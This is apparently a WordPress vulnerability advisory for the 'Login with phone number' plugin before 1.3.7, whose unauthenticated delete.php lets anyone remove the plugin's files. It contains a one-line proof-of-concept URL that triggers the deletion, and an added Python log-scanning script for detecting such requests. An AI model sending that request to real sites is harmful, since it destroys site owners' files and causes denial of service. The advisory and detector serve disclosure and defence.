WordPress Plugin Vulnerabilities
Login with phone number < 1.3.7 - Unauthenticated remote plugin deletion
Description
The plugin ships a file, delete.php, in the plugin directory with no authentication or authorization checks, allowing an unauthenticated user to remotely delete the plugin files, leading to a potential Denial of Service situation.
Proof of Concept
http://example/wp-content/plugins/login-with-phone-number/delete.php?delete=1
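For detection, requests to the path above can be searched for in web-server access logs. The following is an added example, not part of the original advisory or the plugin's code; it assumes common/combined log format, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote

# Path taken from the advisory's proof-of-concept URL.
TARGET = "/wp-content/plugins/login-with-phone-number/delete.php"

# Assumed layout: ip - user [time] "METHOD uri PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_hits(lines):
    """Return {client_ip: [(timestamp, status, delete_param_present), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path, _, query = m["uri"].partition("?")
        # Decode %-escapes, collapse repeated slashes, ignore case.
        path = re.sub(r"/+", "/", unquote(path)).lower()
        if not path.endswith(TARGET):  # endswith also covers sub-directory installs
            continue
        has_delete = "delete" in parse_qs(query, keep_blank_values=True)
        hits[m["ip"]].append((m["ts"], int(m["status"]), has_delete))
    return dict(hits)

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE = [
    '203.0.113.7 - - [16/Feb/2022:10:01:02 +0000] "GET /wp-content/plugins/'
    'login-with-phone-number/delete.php?delete=1 HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.7 - - [16/Feb/2022:10:01:05 +0000] "GET /wp-content/plugins/'
    'login-with-phone-number/delete.php?delete=1 HTTP/1.1" 404 153 "-" "-"',
    '198.51.100.4 - - [16/Feb/2022:10:02:00 +0000] "GET /blog//wp-content/plugins/'
    'login-with-phone-number/delete%2Ephp HTTP/1.1" 404 153 "-" "-"',
    '192.0.2.10 - - [16/Feb/2022:10:03:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4211 "-" "-"',
]

if __name__ == "__main__":
    for ip, events in find_hits(SAMPLE).items():
        for ts, status, has_delete in events:
            # Interpretation (assumption): 2xx means delete.php was still present and
            # answered; 404 means the file is absent (removed, updated or never installed).
            state = "file answered" if 200 <= status < 300 else "file absent or blocked"
            print(f"{ts} {ip} status={status} delete_param={has_delete} -> {state}")
```

A 2xx response followed by 404 responses from the same client, as in the first two sample lines, is the sequence to prioritise when checking whether the plugin files are still intact.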
Affects Plugins
References
Classification
Type
FILE DELETION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Michal Lipinski
Submitter
Michal Lipinski
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-16 (about 2 years ago)
Added
2022-02-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)